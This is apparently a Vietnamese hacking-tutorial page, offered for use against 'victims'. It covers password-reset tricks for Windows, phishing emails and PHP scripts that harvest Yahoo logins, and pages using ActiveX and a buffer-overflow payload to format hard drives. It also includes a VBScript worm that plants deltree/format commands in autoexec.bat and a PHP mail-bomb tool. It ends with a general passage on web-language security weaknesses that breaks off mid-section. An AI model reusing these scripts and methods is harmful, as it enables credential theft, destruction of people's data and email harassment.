--- WARNING: Able to acess share: \\*SMBSERVER\TEMP
......
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?
 

Một cách khác nhằm đoạt quyền của Administrator ở Window

Đối với Win98 : Không khó lắm , bạn vào start menu -->search--> Files and Folders , bạn tìm tất cả những file *.pwl. Sau đó Xóa những file này đi, khởi động lại máy rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account người dùng ,... Bạn khởi động lại máy và log in với user Administrator , không có pass !

Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sẽ giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong !

Trở về đầu trang

Lấy mật khẩu của email

+Trước hết mở hộp thư cua các bạn ra,chọn composed để bắt đầu gửi thư

+Trong phần nội dung,chọn View HTML source,sau đó biên soạn nội dung sau:

Ban co 1 buc dien hoa tu Congaquay85(hoac ten cua ban) voi tieu de nhu sau :

Chuc ban vui ve

Hay nhap chuot vao day de xem buc dien hoa

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php


You have a greeting crad from Congaquay85 with subject :

chuc ban vui ve

Click here to view greeting card

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php



Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào là được ;

----------------------------------------------------------------------------------------------------

<p>Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :</p>


<p>Chuc ban vui ve</p>


<p>Hay nhap chuot vao day de xem buc dien hoa</p>


<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&amp;YY=80401&amp; inc=25&amp;order=down&amp;sort=date&amp;pos=0&amp;/view.php</a></p>


<p></p>


<p>You have a greeting crad from Tran hung anh with subject :</p>


<p>chuc ban vui ve</p>


<p>Click here to view greeting card</p>


<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&amp;YY=80401&amp; inc=25&amp;order=down&amp;sort=date&amp;pos=0&amp;/view.php</a></p>

-------------------------------------------------------------------------------------------

-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở trang web giả mạo trên,lập tưc password sẽ bị lộ.Khi đó bạn hãy vào trang web này để xem kết quả:http://00dt1yahoofake.dk3.com

Nào,bắt đầu tấn công đi,chúc các bạn thành công!
 

Ngoài ra bạn cũng có thể sủ dụng cách này để đạt được sác xuất thanh công cao hơn

Cách 1: đây cũng là 1 cách nhà quê, bạn có thể download Ybrute - 1 chương trình dò Yahoo pass - còn cách sử dụng nó thì đừng có hỏi tui, hỏi là tui oánh đó, lớn tướng rùi mà còn hỏi vớ vẩn. Tuy nhiên khi mới vô thì tui cũng xài qua cách này, điểm yếu của cách này là chỉ có tác dụng khi victim xài pass là 1 từ có trong từ điển hay là 1 câu nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều thời gian (hêhê, cứ vừa ngồi đợi nó tìm mà nghe tiền bay dần khỏi túi).
#Cách 2: bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và user name thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sẽ có nhiều chú thỏ vô bẫy. #Cách 3: Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password email, dial-up, account... như là: Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể Download chúng ở đầy rẫy trên mạng ở các trang hacker.
Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ "chảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui
Nếu bạn có thể tạo trang Web bạn có thể đính kèm Trojan vào trang Web để khi victim vào trang web đó của bạn Trojan sẽ được tự động down về máy victim mà họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để đính kèm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.
Cách 4 Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: lookdown_pass@yahoo.com <mailto:lookdown_pass@yahoo.com>
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript sau:
/config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com nhe!)
Ví dụ:
Tên login của bạn là "hacker", password là "nobody" và địa chỉ muốn lấy pass là "victim@yahoo.com <mailto:victim@yahoo.com>" chẳng hạn thì bạn đánh như sau:
/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="victim@yahoo.com <mailto:victim@yahoo.com>"
*The Yahoo system cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Yahoo sever tới một password của người khác. Password sẽ tự động được gửi đến email của bạn trong dấu"".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành công chỉ khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà không hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà không thấy Yahoo sever hồi âm thì có lẽ bạn lên chuyển sang cách sau

#Cách 5: cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái remember user name and password nữa đâu.
Cách 6: 1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sẽ báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sẽ báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sẽ được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ chờ cho victim checkmail là OK!

 Tuy nhiên hiện nay bravenet đã yêu cầu chứng nhận thông tin của emailform trước khi gửi đi do đó chúng ta chỉ dùng cách này để tham khảo mà không dùng được nữa vì nạn nhân sẽ phát hiện ra ngay. Bởi vậy, tại sao chúng ta không tự tạo ra code cho mình, vừa nhiều tính năng hơn lại khỏi phải phụ thuộc.

2. Tự tạo code:

Trước tiên, bạn đăng ký một free host có hỗ trợ PHP, tôi thấy tốt nhất là cái http://tripod.lycos.co.uk việc này rất dễ , chỉ cần bạn đăng ký làm thành viên của trang này, sau đó làm theo các chỉ dẫn mà nó gửi về mail cho bạn là có thể có một free host dạng:

http://members.lycos.co.uk/tenban

host này có acount FTP nhưng không thể dùng được mà các bạn phải dùng web2ftp.com mà upload. Dùng trang này rất dễ, bên phần "thiết kế và xuất bản web, trong bài 1.2.3 cùng làm forum"tôi có bài hướng dẫn dùng web2ftp.com rất cụ thể. Nào chúng ta làm:

1. tạo các tệp sau: (dùng Notepate, sau đó khi save chọn Allfile với tên tệp là yahoo1.php chẳng hạn)

yahoo1.php:

<?
$f=fopen("yahoo.html","a");
fwrite($f,"$login@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>

yahoo2.php:

<?
$f=fopen("yahoo.txt","a");
fwrite($f,"$login@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>


yahoo3.php

<?
$contactemail = "mailcuaban@yahoo.com"; //
$subject = "password of $login@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src =ym&.last=&promo=&.intltype=us&.bypass=&.partner=&.u= 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>

Tạo tiếp 2 tệp trắng (không có nội dung gì ) là: yahoo.html và yahoo.txt

2. Dùng http://web2ftp.com upload 5 tệp này lên trang lycos của bạn

3. Dùng code:

a. Thay code của bravenet (nếu trước đó bạn đang dùng code của bravenet) bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo3.php" method="post">

nếu bạn muốn gửi kết quả về mail cho bạn

b. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo1.php" method="post">

nếu bạn muốn kết quả được in ra trang yahoo.html sau đó mỗi lần xem bạn chỉ cần gõ:

http://members.lycos.co.uk/tenban/yahoo.html

c. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo2.php" method="post">

nếu bạn muốn kết quả được in ra trang yahoo.txt sau đó mỗi lần xem bạn dùng FTP mở trang này ra hoặc có thể gõ http://members.lycos.co.uk/tenban/yahoo.txt nếu bạn chmod file yahoo.txt là 666 (-rw-rw-rw)

Chú ý, nếu bạn dùng emalform không phải là copy của trang mail.yahoo.com thì khi tạo form nhớ đặt Name cho ô "login" và "đăng nhập" lần lượt là login và passwd.

Trở về đầu trang

Cài vius format ổ cứng victim

Hãy chèn đoạn mã sau vào trang web rồi gởi cho một kẻ khốn khổ nào đó, nó chạy thì ổ cứng của nó sẽ tiêu, đừng chơi tui nha!!!.


<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command /c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>> C:\\d.TXT',true,1);wsh.Run('command /c echo q >> C:\\d.TXT',true,1);wsh.Run('command /c echo y >> C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >> C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c "+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat < d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>

</html>

chúc các bạn thành công, đừng nên phổ biến vì nó rất nguy hiểm

Cách tạo một virus khác format ổ cứng người khác

Sao đây mình xin giới thiệu với các bạn cách sử dụng VBScript để viết một
worm nhỏ xoá sạch ổ cứng của victim. (có thể nhúng vào HTML)
(Lưu ý : dùng với mục đích nghiên cứu, không khuyến khích phá hoại).

Sao đây tui xin giới thiệu với các bạn cách sử dụng VBScript để viết một
worm nhỏ xoá sạch ổ cứng của victim. (có thể nhúng vào HTML)
(Lưu ý : dùng với mục đích nghiên cứu, không khuyến khích phá hoại).

I/để bắt victim thực thi một chương trình nào đó các bạn sử dụng đoạn
script sau:
================
<html>
<head>
<title>L0ng3ta</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi
<script language=VBSCRIPT>
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "c:\windows\notepad.exe",1,False
</SCRIPT></p>
</body>
</html>
================
đoạn Script trên sẽ chạy chương trình notepad. Các bạn có thể copy vào trang HTML
và cho chạy thử.

II/Đoạn Script để chèn một vài lệnh lên autoexec.bat trên ổ đĩa của victim.
======================
<script language=VBSCRIPT>
Function FindFile(PathFiles)
dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FileExists(PathFiles)) Then
FindFile = True
Set f = fso.GetFile(Pathfiles)
If f.attributes and 1 Then
f.attributes = f.attributes -1
End if

Else
FindFile = False
End If
End Function

Sub CreateFile()
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile("c:\Autoexec.bat", True)
tf.WriteLine ("@Echo off")
tf.Close
End Sub

Sub InsertBegintext()
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@Echo Please Waiting for Windows updating your system ...")
tf.Close
End Sub

Sub Inserttext(drv)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@deltree /y " & drv & " > null")
tf.WriteLine ("@Format " & drv & " /q /u /autotest > null")
tf.Close
End Sub

'Kiem tra xem co phai o dia co phai la harddisk hay khong
'Va tra ve true neu no la harddisk
Function ShowDriveInfo(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(drvpath)
If d.DriveType = 2 then
If d.IsReady then
ShowDriveInfo = True
Else
ShowDriveInfo = False
End If
Else
ShowDiveInfo = False
End If
End Function

Sub Main()
Dim fso, d, dc, s, i
Dim a(15)
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
i = 0
For Each d in dc
If showdriveinfo(d) then
a(i) = d
i= i+1
End If
Next
If Not Findfile("c:\autoexec.bat") then
Createfile
End if
InsertBegintext
Do While i>0
i=i-1
Inserttext(a(i))
Loop
End Sub

Main
</SCRIPT>
======================

III>Công việc còn lại là của các bạn, thay vì cho no thực thi chương trình
notepad các bạn hãy đổi tên nó thành "c:\autoexec.bat" thử xem, và các bạn đoán
thử chuyện gì sẽ xảy ra rồi đó, lưu ý là chèn nó thẳng vào file html. Lấy
thêm đoạn source send mail của worm ILoveYou mà thêm vào nữa thì các bạn sẽ có
một con Sworm đáng sợ.

Trở về đầu trang

Tạo bom thư

Sau đây tui xin giới thiệu với các bạn một vài cách làm bom thư chơi người ta:))Bạn copy đoạn mã sau vào WORD rồi save nó dưới dang file html và tiến hành tấn công bằng cách upload lên host , nhưng hiện nay có nhiều host không cho thưc thi hàm mail() nhằm chống lại các cuộc tấn công kiểu DOS, đối với nhưng host như vậy thì đành phải chịu thui:D.

<HTML>
<HEAD>
<TITLE>Bombmail danh cho ban quan tri!</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</HEAD>

<BODY>
<p align="center"><font face="verdana" color="red" size="4">PTV5 Group Bombmail !</font></p>
<p align="center"><font face="verdana" color="red" size="2">L&#432;u &#221; : C&#225;c b&#7841;n bomb email ai c&#361;ng &#273;&#432;&#7907;c ( hi hi hi ) , nh&#432;ng &#273;&#7915;ng bomb ch&#250;ng t&#244;i</font></p>
<?

/////////////////////////////////////////////////////////////////
//
// trungh@00dt1.com
//
/////////////////////////////////////////////////////////////////


if ($action == "BOMB")
{
if (ereg("[A-Za-z0-9_-]+([\.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([\.]{1}[A-Za-z0-9-]+)+", $to))
 {
 echo "Gui $messages den $to<BR><BR><BR>";
 }
 else
 {
 die("Dia chi mail khong dung ($to)");
 }




for ($i = 1; $i <= $messages; $i++)
 {

 $randfrom = rand(100000,900000);
 $randsubject = rand(100000,900000);

 mail($to, $randsubject, "$message", "From: $randfrom@hoangcuongbomb.com");
 echo "Sent message # $i (Subject: $randsubject, From: $randfrom@hoangcuongbomb.com<BR>";

 }


}

?>


<BODY bgcolor="#000000" text="#33CCFF" link="#FFFF00">
<CENTER>
<form name="danangitc" method="post" action="<?php echo $PHP_SELF ?>">
 <table width="692" border="0" cellspacing="2" cellpadding="2">
   <tr>
     <td width="316"><font face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
       * Muốn bao nhiêu lá thÆ°:</font></td>
</CENTER>
     <td width="358">
       <p align="left">
       <input type="text" name="messages" value="500">
       </p>
     </td>
   </tr>
<CENTER>
   <tr>
     <td width="316"><font face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
       * &quot;Tặng&quot; cho thằng nào??</font></td>
</CENTER>
     <td width="358">
       <p align="left"><font face="Verdana">
       <input type="text" name="to">
       </font></p>
     </td>
   </tr>
<CENTER>
   <tr>
     <td width="316"><font face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
       * Ná»™i dung thế nào (cấm chá»­i):</font></td>
</CENTER>
     <td width="358">
       <p align="left">
       <textarea name="message" cols="30" rows="5"></textarea>
       </p>
     </td>
   </tr>
<CENTER>
   <tr>
     <td width="316">&nbsp;</td>
</CENTER>
     <td width="358">
       <input type="submit" name="action" value="BOMB">
     </td>
   </tr>
 </table>
</form>
</BODY>
<p align="center"><font face="verdana" color="#575757" size="-2">Designed and Copyright &copy; 2003 by PTV5 Group . All rights reserved<br>
Contact us : </font></p>
</HTML>

Trở về đầu trang

Các lỗi bảo mật

Trong thời điểm internet và các giao dịch, tương tác thông qua internet phát triển rầm rộ như hiện nay, hàng loạt các ngôn ngữ và các giao thức giao tiếp, thiết kế trang web cũng ra đời để phục vụ cho những mục đích nhất định. Có thể kể đến nhiều ngôn ngữ đã phổ biến như HTML, DHTML, XML, Java, Perl, PHP, ColdFuson, ASP.. mỗi loại có ưu và nhược điểm riêng.
Xét về tính đơn giản, gọn nhẹ thì HTML vẫn là lựa chọn đầu tiên. Tuy nhiên, nếu trang web của bạn yêu cầu khả năng tương tác cao hơn; liên kết và cập nhật dữ liệu động; thể hiện thông tin, đồ họa phức tạp, thì Java hay PHP là lựa chọn thời thượng. Để phục vụ tốt cho mục đích phát triển trang web cá nhân hay tổ chức, chúng ta sẽ đề cập sơ lược qua cách thức hoạt động của một số ngôn ngữ và chuẩn web thông dụng, đồng thời phân tích những yếu điểm của chúng liên quan đến vấn đề bảo mật nếu có từ đó có thể chọn cho mình một ngôn ngữ thích hợp.

1. HTML (Hyper Text Markup Language) - Ngôn ngữ đánh dấu siêu văn bản
HTML được phát triển từ 1989 và được sử dụng rộng rãi cho đến nay để trình bày các trang web dạng văn bản, hình ảnh, âm thanh và các dạng ảnh động. Các chi tiết kĩ thuật của ngôn ngữ HTML hiện nay được bảo hộ bởi tổ chức W3C (World Wide Web Consortium - http://www.w3.org)/.
Một trang HTML là một tệp dữ liệu dạng text có phần mở rộng dạng .htm, .html, .html4 - bao gồm tập hợp của những thành phần HTML (HTML element). Những HTML element sẽ được web browser hiểu và hiển thị trên màn hình thông tin tương ứng với element đó. Ở đây chúng ta chỉ phân tích về khía cạnh bảo mật của các HTML element thông dụng.

<form> - Vùng chứa các đối tượng nhập thông tin của người dùng. Các thành phần cho phép người dùng nhập thông tin là khởi đầu của các nguy cơ về bảo mật. Ở các chương trình thiết kế không tốt, nếu thông tin nhận từ người dùng không phù hợp định dạng hoặc không như mong muốn, chúng có thể tạo nên những kết quả khó lường. Ví dụ một trang web trích thông tin của một người dùng khi nhận tên đăng nhập và mật khẩu của người đó, bằng cách cung cấp thông tin đặc biệt đánh lừa hệ thống, người dùng có thể trích thông tin của tất cả các user khác.

<form action> - Thuộc tính Action. Ta dùng thuộc tính này để chỉ định một trình thực thi trên web server cho đối tượng form. Ví dụ: <form action = "/login.cgi"> ... Khi biết được tên chương trình, ta có thể tìm hiểu thêm các thông tin có giá trị về web server, về thư mục hiện hành của chương trình.

<form method> - Phương thức của form, định nghĩa cách thức dùng để gửi thông tin người dùng nhập vào đến web server cho chương trình xử lý. Khi hiểu được cách thức gửi thông tin (POST và GET), hacker có thể theo dõi và bắt các thông tin đựơc gửi trên mạng, thậm chí có thể thay đổi chúng và gửi đi với giá trị khác để tạo ra những kết quả khó lường.

<script language=<variable>>: Biến truyền vào là ngôn ngữ script phía client, chẳng hạn như: javascript, vbscript, XML.. Khi thay đổi loại ngôn ngữ, hacker có thể vượt qua các bộ lọc kiểm tra.

<input> - Edit control để nhập thông tin. Nếu ứng dụng web không xử lý tốt các thông tin nhập vào, hacker có thể lợi dụng nhập vào các giá trị đặc biệt đánh lừa hệ thống và tạo nên những kết quả không mong muốn. Những giá trị username và password dùng trong kĩ thuật SQL Injection là ví dụ điển hình.

<input type=hidden> - Kiểu đối tượng input. Một số trang web dùng đối tượng input với thuộc tính hidden để chứa giá trị định trước như giá mua hàng ở các trang shopping card. Lợi dụng đặc điểm này, hacker có thể thay đổi giá trị này thành giá trị mong muốn và gửi đến web server. Ở các trang web buôn bán, nếu không có những xử lý giá trị phía server, hacker có thể mua được những món hàng với giá giảm đáng kể.

<input maxlength=<variable>>: Giá trị maxlength xác định chiều dài của giá trị nhập vào đối tượng input. Hacker có thể thay đổi giá trị maxlength cho phép nhập vào những giá trị hoặc chuỗi rất dài. Nếu chúng không được xử lý thích hợp, chúng có thể gây nên những lỗi như tràn bộ đệm, thậm chí có thể làm hỏng web server.

<input size=<variable>>: Tương tự như giá trị maxlength.

<applet> - Java applet. Thuộc tính này dùng để hiện và chạy thẻ java applet. Java chạy và gửi thông tin thường dưới dạng plain text nên có thể dùng các chương trình theo dõi gói tin để bắt các thông tin này. Java byte-code có thể dịch ngược để xem mã nguồn.

<object> Thuộc tính này dùng để thể hiện các đối tượng ActiveX và Java applet. Lợi dụng thuộc tính này, hacker có thể gửi email có nhúng HTML và đánh lừa người dùng chạy các ActiveX control có thể đoạt quyền điều khiển hệ thống. Đây cũng là một trong những cách tốt nhất người ta lợi dụng để lan truyền virus trên mạng.

<embed> Thuộc tính này được dùng phối hợp với thẻ <object> để nhúng các đối tượng ActiveX...

2. DHTML (Dynamic HTML)
DHTML là phiên bản mở rộng của HTML có phần mở rộng dạng .dhtml. Nó giúp tăng cường tính tương tác của các đối tượng điều khiển trong trang HTML tĩnh bằng cách cho phép người ta dùng các script vbscript hoặc javascript điều khiển chúng. Ví dụ một thẻ image để nhúng ảnh vào trang web có thể nhận biết khi nào người dùng di chuyển chuột trên nó bằng cách cài đặt hàm xử lý sự kiện OnMouseOver, khi đó thông qua những xử lý thích hợp sẽ làm đối tượng hình ảnh trở nên sống động hơn. Nhìn chung, bên cạnh những mở rộng như tạo những hiệu ứng MouseOver, chuỗi chữ di chuyển động, thay đổi màu sắc..., các khía cạnh bảo mật của DHTML tương tự như HTML vì nó dựa trên nền tảng HTML. Tuy nhiên hiện nay các lập trình viên web ít chọn DHTML vì có một số trình duyệt không hỗ trợ tốt cho nó, điển hình như Netscape.

3. XML (Extensible Markup Language) - Ngôn ngữ đánh dấu mở rộng
Ngôn ngữ XML mới phát triển trong thời gian gần đây và có thể sẽ được phổ biến rộng rãi trong tương lai, chẳng hạn như ở các ngôn ngữ .NET. Không giới hạn và định nghĩa sẵn như HTML, XML cho phép người dùng tự định nghĩa ra các thành phần riêng và mở rộng tuỳ ý. Tệp dữ liệu XML có phần mở rộng dạng .xml.
Bộ phận quan trọng nhất trong ngôn ngữ XML là bảng định nghĩa DTD (Document Type Definitions). DTD dùng để định nghĩa các thẻ mở và đóng của một tệp XML, giúp người xem có một cái nhìn tổng quát về dữ liệu đang lưu trữ.
Ví dụ ta cần định nghĩa cấu trúc dữ liệu Danh Sách Sinh Viên, ta tạo một tệp DTD dssv.dtd như sau:

<!ELEMENT DSSV (SV*)>
<!ELEMENT SV(MASV, TEN, NS, LOP*)>
<!ELEMENT MASV(#PCDATA)>
<!ELEMENT TEN(#PCDATA)>
<!ELEMENT NS(#PCDATA)>
<!ELEMENT LOP(#PCDATA)>

Đây là ví dụ dữ liệu trong tệp XML:

<?xml version="1.0" ?>
<!DOCTYPE DSSV PUBLIC "." "dssv.dtd">
<DSSV>
<SV>
<MASV>95001</MASV>
<TEN>W_Hat</MASV>
<NS>19/11/1077</MASV>
<LOP>TH95</MASV>
</SV>
<SV>
.....
</SV>
</DSSV>

Dữ liệu trên thể hiện thông tin của một sinh viên với mã số, tên, ngày sinh và lớp. Kí hiệu * nằm sau SV và LOP chỉ định dữ liệu có thể chứa nhiều sinh viên, mỗi sinh viên có thể có nhiều lớp.

4. Perl (Pratical Extraction and Report Language)
Perl là ngôn ngữ lập trình cấp cao được phát triển từ năm 1987. Rất mạnh, tiện dụng và đồng thời là ngôn ngữ được phổ biến miễn phí, hỗ trợ cho hầu hết các hệ thống từ Winđowsx/NT/2k/XP, các phiên bản biến thể của Unix đến hệ thống AS/400, MacOS, Novell NetwarePerl...Perl đã và đang được sử dụng rộng rãi hiện nay trên internet.
Perl được dùng chủ yếu cho các xử lý phía server, tuy nhiên ta cũng có thể dùng perl để viết các ứng dụng client, thậm chí có thể tạo nên ứng dụng chạy độc lập để thực hiện một tác vụ tính toán nào đó.
Trên web server, perl thường được thực thi với CGI tạo nên cơ chế xuất thông tin ra trình duyệt web. Hãy xem ví dụ dùng perl để xử lý các thông tin nhập vào từ người dùng trong đoạn html dưới đây:

<form method=POST action="/admin/login.pl"></form>
<html>
Username:
<input value="" size=80 maxlength=80 name="username">
Password:
<input value="" size=80 maxlength=80 name="password">
<input type=submit value="Login">
</html>

Sau khi người dùng nhập tên, mật khẩu và nhấn nút Login những thông tin này sẽ được gửi đến chương trình perl có tên login.pl nằm ở thư mục /admin/ trên web server. Chương trình login.pl sau khi xử lý sẽ gửi kết quả ngược về web client.

Khi sử dụng perl để thực hiện các xử lý phía server, ta cần lưu ý một số điểm quan trọng sau có khả năng gây nên những nguy cơ về bảo mật nghiêm trọng:
